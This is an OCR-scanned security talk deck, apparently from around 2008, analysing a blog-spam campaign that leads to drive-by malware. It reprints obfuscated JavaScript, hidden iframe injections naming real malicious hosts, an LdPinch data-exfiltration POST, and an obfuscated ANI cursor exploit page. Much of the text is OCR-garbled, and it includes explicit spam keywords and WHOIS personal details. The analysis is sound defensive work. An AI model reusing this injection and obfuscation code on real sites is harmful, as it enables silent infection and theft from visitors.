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Germany, UK also investigating government PC espionage by China 

By Ken Fisher | Published: September 09, 2007 - 09:20PM CT 

In recent weeks,, the Chinese have been accused not only of hacking the Pentagon, but also 
several German ministries and key sites in the UK, as well. In doing research for an 
upcoming story on the Pentagon attacks, I stumbled upon recent reports in Germany of 
surprisingly similar activity 
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By Richard Spencer and Ben Quinn 
Last Updated: 1:09AM BST 06 Sep 2007 

Hackers with links to China's military were last night accused of waging a 
long-term campaign to penetrate the computer networks of British governrr 
departments. 

China denies hacking into Pentagon computers 
British concern over Taliban's Chinese arms 

A day after China denied that it was the hidden hand behind hackers who 
breached Pentagon security networks in the US, "cyberwarriors" acting att 
behest of the People's Liberation Army (PLA) were blamed for breaking inti 
networks at the Foreign Office and other departments. 
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Russia Locked In Cyberwar With Estonia 
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Introduction 



Attackers are using the web in various ways 
to: 

- Push users to their malicious sites 

- Gain access to computers 

- Steal information 

They use many technologies 

-Java/Javascript HTML 

- Iframes Encoding/Obfuscation 
-Spam Injection 
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For this talk we analyzed different types of 
attacks 

- Blog Spam 
-Web site injection 

We dissect the attacks piece by piece to 
analyze and show 

- Source code Commands 



- Network traffic 

- Binaries 



Attack Goals 
Attackers 



Blog Spam 



Analysis process 

- View victim blog, locate malicious comments 

- Trace back all A HREFs in comments 

- WGET code from attacker site 

• Follow any links 

• Decode obfuscated instructions 

• Debug javascript 

- Firebug, Venkman 

• Decompile Java Applets 

- Lookup owners of domains / IPs 

- Reverse any exploits / binaries 




Blog Spam 




1 st Stage of the attack 

- Uses comments to sites 

- Blogs such as Drupal & Wordpress 

Comments: 

- Usually in response to valid post 

- Splice together random but legitimate phrases 
from sources such as wikipedia 

- Contain several linked words to various sites 

- Will be added en mass to many disparate posts 

- Often will have non-English embedded words 
such as Italian, German, Russian 
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7adaed8bf283a469f32bcele97fl3d9; 
The Cretaceous-Tertiary extinction event 
species in a geologically short period of time, approximately 65.5 million years ago (mya). site 
www moto guzzi it, legno massello copertura. It is associated with a geological signature, 
usually a thin band dated to that time and found in various parts of the world, known as the KT 
boundary, edilizia pubblica, giochi completi download. The event marks the end of the 
Mesozoic Era, and the beginning of the Cenozoic Era. inquinamento da traffico, donna nuda 
lesbica. Non-avian dinosaur fossils are only found below the KT boundary and became extinct 

: 1 :.. j... i.. , u ...£ — ... j ,..;„„ j-u... - — n t. rovlgo hotel albergo, sito porno star. Mosasaurs, 

^i^iujuu,^ p^.u^uuij ■_.■■._. MiLJiiy Jh .jcies of plants and invertebrates also became extinct, capra 
umberto saba, annuncio hard sicilia. Mammalian and bird clades passed through the boundary 
with few extinctions, centri termali vallese, lettera damore it. and radiation from those 
Maastrichtian clades occurred well past the boundary, blocco autocad 3d, pisa prouincia. Many 
scientists theorize that the KT extinctions were caused by one or more catastrophic events such as 
massive asteroid impacts or increased volcanic activity, agenzia uiaggi modena, centro 
congresso mestruo venezia, Several impact craters and massive volcanic activity in the Deccar 
traps have been dated to the approximate time of the extinction event, scommessa galoppo, 
milly d abbraccio calendario 2003. These geological events may have reduced sunlight and 
hindered photosynthesis, leading to a massive disruption in Earth's ecology, trans inculata, ita 
calvino barone rampante. Other researchers believe the extinction was more gradual, rp^nlti 



. ' : 



Inicie sesion o registrese para 



C8932639ee4b91fal367be834t5844c2 

The Hoysala Empire was a prominent Sou-.,, ,.,,.-,,._,«, ■_• < . .,_... ... ...i._... ■ ._.■.-._■ .■■._._■... .... ..,,... ,,,....^:.,,, ._.._.,■ . 

of Karnataka between the 10th and the 14th centuries. Disegni Sulla Pace, sborrate in bocca 
gratis. The capital of the Hoysalas was initially located at Belur but was later moved to Halebidu. 
passero solitario parafrasi, testi canzoni gigi d alessio. The Hoysala rulers were originally 
hill peoples of Malnad Karnataka, an elevated region in the Western Ghats range. Ronaldigno it, 
Ricetta crep. In the 12th century, taking advantage of Accompagnatore Nilano Versatile, Vot 
Profili Ragazze. the warfare between the then ruling Western Chalukyas and Kalachuri kingdoms, 
Ragazze Russe Cercano Italian!, Ricetta crep. they annexed areas of present-day Karnataka 
and the fertile areas north of the Kaveri River delta in present-day Tamil Nadu. Cannata Peron, 
ministero pubblica istruzione it. By the 13th century, they governed most of present-day 
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Cretaceous 

Submitted by drff2230S on 14 March, 2008 - 14:1 1 . 

7adaed8bf283a469f32bce1 e97f1 3d97 

The Cretaceous-Tertiary extinction event was the large-scale mass extinction of animal and plant 
species in a geologically short period of time, approximately 65.5 million years ago (mya). edilizia 
pubblica, armadi cabina. It is associated with a geological signature, usually a thin band dated to that 
time and found in various parts of the world, known as the KT boundary, eden village kournas, ing 
unimore it. The event marks the end of the Mesozoic Era, and the beginning of the Cenozoic Era. 
elenco hotel canazei, legno massello copertura. Non-avian dinosaurfossils are only found below the 
KT boundary and became extinct immediately before or during the event, fermentazione vino, sesso 
estremo gratis. Mosasaurs, plesiosaurs, pterosaurs and many species of plants and invertebrates 
also became extinct, trans inculata, sesso estremo gratis. Mammalian and bird clades passed 
through the boundary with few extinctions, albergo hotel avellino, affitti case vacanza villasimius. and 
radiation from those Maastrichtian clades occurred well past the boundary, testo pazza inter, pisa 
provincia. Many scientists theorize that the KT extinctions were caused by one or more catastrophic 
events such as massive asteroid impacts or increased volcanic activity, site www moto guzzi it, 
vendita casa prato. Several impact craters and massive volcanic activity in the Deccan traps have 
been dated to the approximate time of the extinction event, trasmettitore wireless video, yamaha 
sintoamplificatore. These geological events may have reduced sunlight and hindered 
photosynthesis, leading to a massive disruption in Earth's ecology, sintomo artrosi cervicale, 
download convertitore divx dvd. Other researchers believe the extinction was more gradual, resulting 
from slower changes in sea level or climate. 

» Login or registerto post comments 

Hoysala Empire 

Submitted by mer2230S on 11 March. 200S - 12:45. 
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The Hoysala Empire was a prominent South Indian empire that ruled most of the modern-day state 
of Karnataka between the 1 0th and the 1 4th centuries. Trucchi Narnia, piano cottura vetroceramica 
induzione. The capital of the Hoysalas was initially located at Belur but was later moved to Halebidu. 
Diario Anna Frank, Sfondi Windows Xp Gratis. The Hoysala rulers were originally hill peoples of 
Malnad Karnataka, an elevated region in the Western Ghats range. Donna A Pecorina, modello 740 
2007. In the 1 2th century, taking advantage of Costo Del Metano Al Mc, Donna Bologna Annuncio 
Personale Amore. the warfare between the then ruling Western Chalukyas and Kalachuri kingdoms, 
Adunanza It, sborrate e pompino. they annexed areas of present-day Karnataka and the fertile areas 
north of the Kaveri River delta in present-day Tamil Nadu, testo canzone adagio lara fabian, Letti A 
Soppalco Per Adulti. By the 1 3th century, they governed most of present-day Karnataka, parts ofTamil 
Nadu and parts of western Andhra Pradesh in Deccan India. TVideoclip Sesso. Tabelline 
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lornonosov.org/cooperation.htrnl - 13k - Cached - Similar pages - Note this 
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My L a n g U a g e : Fyc C KM Mi - [ Translate this page ] 

LUeH: flaoccKMM u,ehrrp b Mockbo. ObyMehme boctomhum npaKTHKaM, ceMMHapu, ml^mh, i^kiryH , 
((jeH-LuyM, KMTaMCKaa acTpojiorkifl, Mora. Bnrj^noTeKa, paccbuiKa «flaoccKne ... 
www.niylanguage.gov.au/ru/13B1273 - 9k - Cached - Similar pages - Note this 

The pattern of the lifetime's canvas - flepeBOflHM peuenTbi BMecTe - [ Translate this page 

31 Okt, 2008 at 4:49 AM. KmaMCKoe MUHflajibHoe ne^eHbe (Chinese Almond Cookies) 3to 
npocToe m BKycHoe MHHflajibHoe ne^eHbe otjimmho noflaeaTb Kor^a yro^HO. ... 
narakeshvara.livejournal.com/1137S0.html - 25k - Cached - Similar pages - Note this 

CCblflKH none3Hbie H HHTepeCHbie - [ Translate this page ] 

Bee o flpaKOHax: JiereHflbi, MCTopHki, ubaKTbi, MccnefloeaHMfl. rajiepen, rjn5;iM0TeKa. Bojiee 

600 M5 MH^OpMaL^MM. 

dragonest.by.ru/main/links.html - 28k - Cached - Similar pages - Note this 

AujpaM.Py:: ApXHB - [ Translate this page ] 

2006, 15 OKTflEipfl 2006 r. (eocKpeceHbe) b L^ei-rrpe -sOTKpbiTbiM Mkips- (MocKBa) coctomtca 
pmyaji Byflflbi Me^nL^i-ibi b McnojiHeHMM MOHaxoe TkiEieTCKoro MOHacTbipa. ... 
ashram.ru/archives/archives.htm - 22k - Cached - Similar pages - Note this 

godsdiensten - [ Translate this page ] 

yinyanggoud-anirni.gif (12719 bytes) radvandeleer-anim.gif (13058 bytes) stervandavid-anim.gif 

(10310 bytes) kruisgoud-anim.gif (10026 bytes) moskee-anim .gif ... 

www.law.kuleuven.be/chineesrecht/webterras/godsdien1.htm - 134k - 

Cached - Similar pages - Note this 
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albergo hotel avellino 



Avere poco sale nella zucca 



albergo hotel avellino 



Hotel avellino elenco hotel avellino prenotazione hotel 

II portale del turismo in carnpania. hotel avellino elenco hotel avellino prenotazione hotel 

avellino vacanze aveUJno.AveU.irio hotel avellino alberghi avellino prenotazione hotel 

Per visualizzare solo gli hotel a avellino che hanno carnere disponibili e prenotabili seleziona le 

date di arrivo e partenza dal box di ricerca sulla Pasqua hotel avellino, italia alberghi avellino, 

last minute 

Hotel avellino confronta i prezzi e prenota on line il tuo albergo a avellino. Campania tour hotel 

alberghi avellino 

Guida agli alberghi di avellino e provincia, informazioni utili per contattarli e 

raggiungerli, Alberghi ad avellino hotel ad avellino dorrnire ad avellino hotel 

Hotel alberghi avellino provincia in questa pagina puoi trovare alberghi, hotel e strutture 

ricettive di varie tipologie e categorie presenti nella Hotel de la ville 

Hotel de la ville via palatucci 20, 83100 avellino, italy tel +39 0825 780911 fax +39 0825 780921 

email info@hdv, av.it. Avellino hotel, avellino alberghi, avellino hotels, elenco hotel 

Hotel avellino, alberghi avellino, hotels avellino, previsioni meteo avellino, last minute hotel, 

saperviaggiare.it elenco hotel ed alberghi in avellino. Hotel provincia avellino / alberghi 

provincia avellino 

Elenco ed informazioni su tutti gli hotel in provincia di avellino. degli hotel trovi i servizi, i 

prezzi, il sito, le promozioni ecc. Alberghi avellino alberghi gli alberghi di avellino tutti gli 

Cerca gli alberghi di avellino. su ept trovi tutti gli alberghi della provincia di avellino il solofra 

palace hotel resort una raffinata oasi verde. hotel avellino | alberghi avellino 

Alberghi hotel avellino in questa pagina troverete la lista completa di tutti gli alberghi, hotel, 

motel, agriturisrno, affittacamere, bed breakfast nella Hotel avellino hotel civita hotel civita 

atripalda ( avellino 

Hotel avellino hotel civita hotel civita atripalda ( avellino ) hotel carnpania albergo avellino hotel 
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Blog Spam 



Site made to look like normal blog 

Links don't actually work 

Page actually for deploying malware 




Blog Spam 



Attack often comes from same domain with slightly 
different name: 

- qff09296@averfame.org 

- drff09296@averfame.org 

- drff52122@averfame.org 

- mer52122@averfame.org 

Attack domain averfame.org info: 



Sponsoring Registrar: EstDomains, Inc. (R1345-LROR) 

Registrant Name: Harold Lani 

Registrant Organization: China Construction Bank 

Registrant Streetl : Mansion, No. 31 Guangji Street, Ningbo, 
315000, CN 

Registrant Email: harold(S)avereanoia.org 



IP Address: 78.108.181.22 
descr: UPL Telecom 
changed: serge@upl.cz 20071227 
address: UPL TELECOM s.r.o 
address: Vinohradska 184/2396 



Blog Spam 



China Construction Bank known in the 
past for malware 

- State owned bank 

In 2004 several executives were 
executed by the state for engaging in 
financial fraud 

In March 2006 it was reported to be 
hosting phishing sites targeting US banks 




Blog Spam 



While the e-mail address given to post the malicious 
comments was owned by China Construction Bank, 

- The HTTP connection to make the posts came from 
212.227.1 18.40 based on various web logs 



212.227.118.40 
Domain: kundenserver.de 
Address: Erbprinzenstr. 4-12 
City: Karlsruhe 
role: Schlund NCC 
address: Brauerstrasse 48 
address: Germany 



infong113.kundenserver.de. 

Name: Achim Weiss 

Pcode: 76133 

Country: DE 

address: 1&1 Internet AG 

address: D-76135 Karlsruhe 

e-mail: noc@oneandone.net 
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Search | 



Advanced Search 
Preferences 



Web 



Results 1 - 10 of about 7,400 forfoto donna nude amatoriali debora. (0.20 seconds) 



ncxtlhQeu - Interview Gilles de Robien - Forum evenementiel „. 

cazzi amatoriale gratis casalinghe succhiatrici debora caprioglio trailers film .... donna foto 

nude donne aniiane che fanno sesso erotic fotografi ... 

forum, voyages, orange.fr/lirernessages. php?idservice=1 001 0&idsection=1820&thread=306 & 

page=1 - 189k - Cached - Similar pages - Note this 

El Juego de Edgar I Chosto.com 

Ciat Msn, thais velina foto. The contents were heavily influenced by ... that is still used today. 
donna nude amatoriali, concorso allievi marescialli. ... 
www.chosto.com/?q=node/34 - 44k - Cached - Similar pages - Note this 

Herrzlich Willkommen! I Peter Schnitzhofer 

Cannata Peron, Melissa P Foto. By the 13th century, they governed most of... Israeli 
withdrawal in June 1974. bevitrici di sborra, donna amatoriali nude. ... 

peter.schnitzhofer.net/?q=node/1 - 32k - Cached - Similar pages - Note this 

ChroniX Videos- Episode 3- <div>Check out these metal videos „. 

j foto amatoriali di casalinghe porche donne schizzate di merda mature che scopano animali 

meravigliosi streap video gratis niaas mamando obbese troie sborra ... 
i www. chronijtradio. com/modules. php?name=NewsS i file=articleS i thold=-1S i mode=flatS l order=0S l 
- sid=434 - 977k - Cached - Similar pages - Note this 

Forum :: Leggi il Topic - galleria foto sesso gratis 

foto sexy donna nuda sella moto video amatoriale porno gratis sicuro .... video clip louisiana 

I nude amateur wives [/url] showtime late night soft porn dvds ... 
www.progettofamiglia.com/forum/viewtopic.php?p=205238 - 47k - 
Cached - Similar pages - Note this 

trisken.net > Trisken.net Forums > forum trisken.net > Over onze „. 

video porno bollenti immagini erotiche amatoriali di donna con due uomini gratis ... www foto 
di donne e uomini nudi it sfondi free donne nude ... 

Iwww.trisken. net/index. php?name=Forums&file=viewtopic&p=1935S - 744k - 
Cached - Similar pages - Note this 

; vsartsarg.org- Noticias 

Odizhev them, sentenced released or incinta yjav.com privata foto donna nuda Automobili 

i foto Informazioni debora italiane supertette tedesco foto Vera ... 
vsartsarg.org/modules/news/article. php?storyid=29 - 272k - Cached - Similar pages - Note this 

Issue Topic to discuss about I vaaGmi 

... a method that is still used today, donna nude amatoriali, frasi d 'amore. ... and religious 

I narratives, debora caprioglio nuda, Vespa 125 Primavera. ... 
www.vaagmi.com/?q=node/15 - 50k - Cached - Similar pages - Note this 






Most of 
these sites 
have the 
blog spam in 
comments 
on them. 






Blog Spam 



The URL's linked to by the first comment listed in order are : 

- mir-t.ru/files/rolling stones testi/rolling stones testi.htm 

- mebelionika.ru/download/site/libreria blocchi autocad/page libreria blocchi autocad.htm 

- mebelionika.ru/download/scarica gratis msn live spaces/listing/page scarica gratis msn live spaces 
.html 



dich.com.ua/forum/video porno scaricare gratis/video porno scaricare gratis.htm 

miM.ru/files/cavalli da salto.html 

dich.com.ua/forum/croccantino gelato.html 

miM.ru/files/apt lombardia.htm 

mebelionika.ru/download/index sherk cartone animato.htm 

dich.com.ua/forum/video porno com/page video porno com. htm 

mebelionika.ru/download/foto zero assoluto/foto zero assoluto.htm 

miM.ru/files/rolling stones testi/rolling stones testi.htm 

dich.com.ua/forum/video hard casalinga gratis/video hard casalinga gratis.htm 

miM.ru/files/video casalinghe gratis/video casalinghe gratis.htm 

mebelionika.ru/download/villaggio vacanza corsica/comp/page villaggio vacanza corsica.htm 

dich.com.ua/forum/esercizio svolti elettrotecnica/esercizio svolti elettrotecnica.htm 

mebelionika.ru/download/falze trevignano/falze trevignano.htm 

miM.ru/files/video porno con ragazzine/page video porno con ragazzine.html 

dich.com.ua/forum/video porno com/page video porno com. htm 

miM.ru/files/foto privata donna incinta nuda/style/foto privata donna incinta nuda.html 

mebelionika.ru/download/video clitoride/index/index video clitoride.html 
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The second attack contained a different set of URLs with similar 
content 

- www.daolao.ru/Confucius/Pound/it/worlcl/negozi abbigliamento ravenna/negozi abbigliamento ravenna 
.htm 

- www.economypmr.org/giic/video lesbica asiatica gratis/world/video lesbicaasiatica gratis.htm 

- www.economypmr.org/giic/assicurazione suimbarcazioni/to/assicurazionesu imbarcazioni.html 

- www.daolao.ru/Confucius/Pound/it/hoteljprovincia di rovigo/verso/page hotel jprovincia di rovigo.ht 

mi 

- www.economy-pmr.org/giic/antivirus scansione online.html 

- www.daolao.ru/Confucius/Pound/it/montaggio gru edilizia.htm 

- www. economy 'pmr.org/giiclworidlmagnoiianegritalindexmagnoiianegrita.htmi 

- www.daolao.ru/Confucius/Pound/it/ediliziajJubblica/index edilizia pubblica.html 

- www.economy-pmr.org/giic/antivirus scansione online.html 

- www.daolao.ru/Confucius/Pound/it/aterjprovincia romalpage aterjprovincia roma.html 

- www.economypmr.org/giic/incontro jjrivati annunciojpersonali/top/incontrojprivati annunciojpersona 
li.htm 

- www.daolao.ru/Confucius/Pound/it/albergo hotel avellino/albergo hotel avellino.htm 

- www.economypmr.org/giic/city/cucina cinese ricetta/index cucina cinese ricetta.html 

- www.daolao.ru/Confucius/Pound/it/test colesterolo.html 

- www.economypmr.org/giic/news/annuncio hard sicilia/annuncio hard sicilia.htm 

- www.daolao.ru/Confucius/Pound/it/istruzioni ricarica cartuccia epson/nix/page istruzioni ricarica cart 
uccia epson. h tml 

- www.economy-pmr.org/giic/agriturismo guidonia/italia/agriturismo guidonia.html 

- www.daolao.ru/Confucius/Pound/it/lol/video sesso scaricare gratis/index video sesso scaricare grati 
s.htm 



There are only 
five different 
domains actually 
in use. 
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MIR-T.RU 


DICH.COM.UA 


DOMAIN OWNER INFO 
ipaddr : 89.108.95.149 
person : AleksandrAArtemyev 
e-mail: sahasaha^bk.ru 
registrar : RUCENTER -REG-RIPN 

NETWORK OWNER INFO 

netname : AGAVACOMPANY 

address : AGAVA JSC 

address : B. Novodmitrovskaya sir., 36/4, 12701 5 

Moscow, Russia 

phone :+7 495 4081790 


DOMAIN OWNER INFO 
ipaddr : 217.20.175.128 
person : Oleg Teteryatnik 
e-mail : mazai(2>tnmk.com 

NET WOR K OWNER INFO 

address : WNetISP 

address : Pochayninska sir. 25/49, off. 30, 03 148, Ukraine, 

Kiev 

phone: +38 067 786 96 12 

changed : gusak@wnet.ua 2006073 1 


mebelionika.ru 


DAOLAO.RU 


DOMAIN OWNER INFO 
q>addr : 217.16.16.145 
org: "Impuls -Plus" Ltd. 
e-mail : info@mebelionika.ru 
e-mail : mebelionika@gmail.com 

NETWORK OWNER INFO 

changed : caspy@masterhost.ru 20030507 

registrar : RUCEN TER-REG-RIPN 

address : Lyalin lane 3, bid 3, 105062 Moscow, Russia 

phone: +7 495 7729720 


DOMAIN OWNER INFO 
ipaddr : 217.16.16.153 
phone : +7 095 0000000 
e-mail : yukan@tsinet.ru 

NETWORK OWNER INFO 

changed : caspy@masterhost.ru 20030507 
address : Lyalin lane 3, bid 3,105062 Moscow, Russia 
phone : +7 495 7729720 


ECONOMY -PMR.ORG 




DOMAIN OWNER INFO 

ipaddr: 91.196.0.85 

Registrant :Name:Makruha Igor N. 

Registrant : Organization :Eco nomy 

Registrant : Streetl :Tiraspol, Sverdlova, MD (Moldova) 

Registrant : Phone:+3 73. 93224 

Registrant : Email:pom@economy .idknet.com 

Admin Name : Makruha Igor N. 

NETWORK OWNER INFO 

descr : Ho stB izUa Data Center 
notify : msil@hostbizua.com 
address : Polarnastl5 , 3 fw. 
address : Ukraine, 04201 Kyiv 
phone: +380(44) 5017659 
e-mail: support@hostbizua.com 
person :Valentin Dobrovolsky 
address : Ukraine, Kyiv 
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www.economv-pmr.org belongs to the 
Moldovan government 

- Economic website 

- Sites been compromised by the attackers 

- Serving up spam / malware unbeknownst to 
owners 

Adds even another level of complexity 

- Yet another country and now government 
involvement 
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Already we can see attack's complexity 

- 3 countries 

- Domain owned by China, hosted in Czech 
Republic, attacker posting from Germany 

Serious international and language 
barriers in the way of removing attack 

Easy to change one or all pieces of attack 
to make blocking hard 
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So what's the purpose of this type of 
attack? 

-Advertising $ on clicks 

- Adware/Spyware installation $ 

- Information Stealing 

- Botnet building 

- Raising search rankings 
-Acquiring Mpack nodes 






Blog Spam - Attack Code 
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Besides fake blog HTML there is also obfuscated 
Javascript 

- First there is a call to a URL decoder 

• return decodeURIComponent(cook[1]); 

- Next section sets two variables 

- Following the variables is a section of numbers 

• Actually decimal encoded URLS 

- Example: 

• On the ASCII table 104 = h, 116 = t, 112 = p forming Mp 

- Helps hide the URLS from people searching through the code as 
well as from IDS's and automated scanners looking for javascript 
URL redirection type traffic 

- The browser will decode and use these obfuscated URLs with no 
problem but over the wire it will just look like decimal numbers 
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var p = (String.fromCharCode.apply(window, [104, 116, 116, 112, 58,47,47, 109, 
121,98, 101, 115, 116,99, 111, 117, 110, 116, 101, 114,46, 110, 101, 116,47, 112, 
114, 111, 103, 115, 116,97, 116, 115,47, 105, 110, 100, 101, 120,46, 112, 104, 
112,63,85, 110, 105, 113,67, 111, 111, 107,61]) + 

Counter + "&referer=" + encodeURIComponent(document.referrer) + 

String.fromCharCode.apply(window, [38, 100, 114, 119, 61, 104, 116, 116, 112, 37, 
51,65,37,50,70,37,50,70, 119, 119, 119,46, 100,97, 111, 108,97, 111,46, 114, 
117,37,50,70,67, 111, 110, 102, 117,99, 105, 117, 115,37,50,70,80, 111, 117, 
110, 100,37,50,70, 105, 116]) 

Each of these variables decode to the following URLs: 
- http://mybestcounter.net/progstats/index.php?UniqCook = 



&drw=http%3A%2F%2Fwww.daolao.ru%2FConfucius%2FPound%2 
Fit&drw=http://www.daolao.ru/Confucius/Pound/it 
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Next section contains further obfuscation 

- Sets up an iframe in order to cause the browser to 
load the previously discussed encoded URLs 

- The iframe will be a 1 pixel by 1 pixel essentially 
invisible frame which the user will never see but which 
will get loaded 

- The words iframe, src, marginwidth, marginheight, 
frameborderwere broken up into multiple variables, 
lines, and concatenated strings 

- This makes it even more difficult to detect 
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); 



var x = "rame"; 



NOTE how they break up the 
word FRAME to make it 
harder to detect 



var y = T + T; 

var el = document.createElement(y + x); 



e 
e 
e 
e 
e 
e 
e 



.setAttribute 
.setAttribute 
.setAttribute 
.setAttribute 
.setAttribute 
.setAttribute 
.setAttribute 



("width", 1); 
("height", 1); 
("s" + "re", p); 
("marg" + "inwidth", 0); 
("marg" + "inheight", 0); 
("scr" + "oiling", "no"); 
("f" + "rameborder", "0"); 







1 ■■■ * **^ ■ 

■ 


^-.^ ^PV'-A ;.. "; ■•■rrr 
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Attack chains several HTTP redirects 



<iframeWIDTH=1 HEIGHT=1 src=" http://x-qlobstat.cc/adsview/a63?tip=user "></iframe> 

<iframe src=" http://bid-assist.org/inst/index.php?id=002 " width=1 height=1></iframe> 

<iframe src='' http://www.climbingthewall.info/d/wm017/counter21.php '' width=1 
height=1 ></iframe> 

<iframe src=http://prolnx.info/lc1 008.html width=2 height=2 style=display:none></iframe> 



http://prolnx.info/lc1 008.html 



| ^Tamper beta * DnwUno request! 






^laiiU 


5t & l Tamper Stop Tamper Gear 






Options He^ 










Ftof p 






SbowAl 


IJT^^^Uw«jT^gj^^g^pj^^^CwJwitTy^^^^ 


llg^^^^^^^^^^^^^^^^^^^^^^ 




UwdFJM^^jRl 


L 7; 1 7:4? .609 7&1 nts 7&J ms ?B£ 0£r zoo 05tt)htmJ 


http ;JJsb.aoooJe.contf*aFebf owsir^updatie^rt-navcterrt' autof f o*2- 0.0- S4fiBsv*r- L .3. L .3-2OQ703Gf L^fe^ersjon. 


. LC-ftD^NOfiinw. 


|7:|S:2Q.g37 594 m-.. 594 ii;-_ -L 3T ^ KxtjhtmJ 


r*tp :^m>fce^ courier .ret.Ip-OO^att.iVriex .php7Uft«|Caeko Lftrtf ercn 


=^rw=H«p%3A%2F V^2Fwww.daoUH3.pu*t2FC. . 


. LOflD_DOCUME... 


I7:lfc2ha27 7l4&3ms 71455 ms -L ST 301 a«ik*ton/K'Uf*™wn-. 


. http:J/vww,u>fota.ru^[x^kK 




L&fl&jShLTjF... 


17:19:35.2)65 2L9ffK; 2L9mS 356 ST 200 laifc/htmJ 


hup :^upJateorifte.^c^proo/rAme.p>ci^doi>5 - 1 




L0flD_DOCUVE... 


17:21:0027 4flS78ms +fiS78ms -1 ST 200 taxtfitiiri 


httpc ft* ■ gkibstat . -oreads vi*w/a63 ^ -us « 




LOA0J)0CUW„, 


fc7:21 :Hh359 32562 mi 32562 mi 397 ST 404 ■-, ■: i".-i ii.l 


hUp : J Jbd^ftiL dtu. f j-itfjfti ,Jtx .phpTfd-OQZ 




LOAD_DOaJWE... 


t7:2li3a.6S7 l426Sms MSfiSms L3L ST 200 tetfjWml 


HUtaflVw^*Tlllh0liHWal.h^^ 1 .ptu 




LOADJMCUHE,,, 


fc7:21:52.B90 323 mS 323 ms 49B5 ffT 200 teaJt/htrnJ 


hHj^i^pioJhx.irfo^S008.htm1 




LOAD DOOM... 


Request Header Name J Request Header Vabe 


Response Header Name 


| Response Hesdsr YeJua 


1 


Host www.didao.iu 




Status 


NbtModfied-3Q4 




UHa ■ -.jn :■ MMfa^.Q (WrufewS; U; WiftdoWf NT 5. 1 r en-US" rv: 1.6. 1,3) GecJ^2D07€6fl9 ... 


Date 


Sat, L5 M* 2008 01:Lfi:33 rj^T 




Accept textysirJ, ap^abonJ^fri.aflFfcaLici^MrrJ+xrrJ, ttAifNtrrJ; QnO.s.taxt/pJatf ; o»0. — 


CtiftfM.uiOfl 


fc*ep-afee 




AeeepManQjacj* en-us,en.,;q«a .5 




Kaep-Jfra 


:'iic.ju'.=5 




Accept -EtxdoV>q p^deflate 




seivef 


Apathe, 




Aseept-Charset ISQ-3853-3 .irff-a-^i-Q.J/i^Q.J 




Etag 


H la2569-43*&-1 7^33^ 




Keep-Afiv* 300 




E?p*es 


Sat, 15 M* 2003 01:15:33 Q^IT 




GwwecUen Jceep-aftYe 




cache-control 


nux-age-Q 




Cookie Courter=L 










ff-Modf*d-5rw* Thu, 1 3 Mar 2003 21 : 57: D7 GMT 










lf4Stww-rvyteh " La25D9-43dS-47rtga333" 











Ma I ware 

• End goal is to deploy malware 

- Pornocrawler.exe 

• Turns out to be LdPinch which HTTP POSTs : 

POST /winupdate/newgate/gate.php 
HTTP/1.0 Host: www.updateonline.ee 
Content-Length: 14390 

DATA: 

a=roots982(a)mail.ru333&b=Pinch report&d=report.bin&c=UDNNTAAAAAARIAAAEQAAA 
AAAAA .. snip AAAAAA== 

Info about victim including: 

- installed software, hostname, domain 
name, internal IP address 



:*mt 
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Updateonline.ee has IFRAME which sends 
browser to p ro I nx. info/I c1008.htm I 

Code highly obfuscated 

Spiders off in many directions 

Eventually deploys a rootkit 



[2W 
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Lc1008.html Source 

<html><head><title>404 Not Found</title> 

<style> 

* {CURSOR: url("anr/us1008.anr")} 

</style> 

</head> 

<body><h1>Not Found</h1> 

<p>The requested URL was not found on this server.</p> 

<hr> 

<address>Apache/2.2.4 (EL4) Server at www.prolnx.info Port 80</address> 

<script language="JavaScript"> 

function QfPViCa(ii){varks="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";var 
oo="";var d ,c2,c3;var e1 ,e2,e3,e4;var 

i=0;do{e1=ks.indexOf(ii.charAt(i++));e2=ks.indexOf(ii.charAt(i++));e3=ks.indexOf(ii.charAt(i++));e4=ks.indexOf(ii.c 
harAt(i++));d =(e1 «2)|(e2»4);c2=((e2&1 5)«4)|(e3»2);c3=((e3&3)«6)|e4;oo=oo+String.fromCharCode(c1 );if( 
e3!=64){oo=oo+String.fromCharCode(c2);}if(e4!=64){oo=oo+String.fromCharCode(c3);}}while(i<ii.length);return 
oo;} 

function qpYrz(a1 ,b1 Hvar i; var o="";if (!b1 ) return 

document.write(qpYrz(QfPViCa(a1 ),arguments.callee.toString().replace(/[ A a-zA-Z0-9]/g,"")));for (i=0; i<a1 .length; 
i++){o+=String.fromCharCode(a1 .charCodeAt(i%a1 .length) A b1 .charCodeAt(i%b1 .length));}return o;} 

qpYrz('WhQeExgMG04SHzOXRwBfC1wXD1wKGgABHEklA1wXVVBkUHAcJDg1VBQAHEx8GVEVFBhk9BhJsV3AbKB 
oylmMoljNLUUoPBAMPBBhSb1kQBiVUGw1TMysCFQ5fX0oFEzdgUUBR0bGURJDVACAhsGEw1UTRkVBAg9B 
BQbHxlhSAUXJQoWW2tHAhpBMRdSQwo1HAwTFIdvBwFcDA1SFgUEHDdBBQktXUkZOwgKDRIZDRwRWhQe 
AjRWKEAQABADC18PobF1gNQ1ZcUk4DEx5HS0UGVBQEARkGTQcDChADES0VBwFLXUJKejAUUjUJMyMEJ 

. . . snip . . . 

zV2DyoGFEMEUggbCEdHT3keaxFmWUoHDCEdAh1QbQ==\ null); 

</script> 
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Ld008 focused on delivering multiple payloads 

- Payload providing long term control and covert 
access of exploited targets 

• Installs the agony rootkit 

• Sets up a covert channel on the target 

- Payload providing modular control and access to 
target 

- Provides dynamic extension of payloads through 
covert or obfuscated channels 

- Very concerning due to its modular nature 

• Can be easily morphed to any purpose 

• Remains the same on the target 
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The us1008.anr exploit is run from the following 
piece oflc1008.html: 

- <style> 

- * {CURSOR: url("anr/us1008.anr")} 

- </style> 

The file anr/us1008.anr is itself a paylod of type 
2 (Win32.Exploit.MS05-002.Anr) 

www.prolnx.info/anr/us1 008.anr has the file 
header RIFF....ACONanih and contains the 
string c:\anr1008.exe as well as urlmon.dll 
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Function qpYrzQ deobfucates the remainder of 
the webpage and then issues 

- "GET/?id=1008&t=other&o=0 HTTP/1.1" 

- Attempts to run downloaded file from the users Temp 
Internet Files dir 

- If user is administrator this installs the agony rootkit 
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Deobfucated webpage continues animan.class 

- Allows the malicious webpage to extend the class Applet 

- Updates the current webpage to this: 

• <applet archive=Java2SE. jar code=Java2SE. class 
width=l height=l MAYSCRIPT> 

• <param name=usid value=1008> 

• <param name=uu value=http: //prolnx. info/> 

• <param name=tt value=other> 

• </applet> 

• <applet archive=dsbr . jar code=MagicApplet. class 
width=l heigh t=l name=dsbr MAYSCRIPT> 

• <param name=ModulePath 

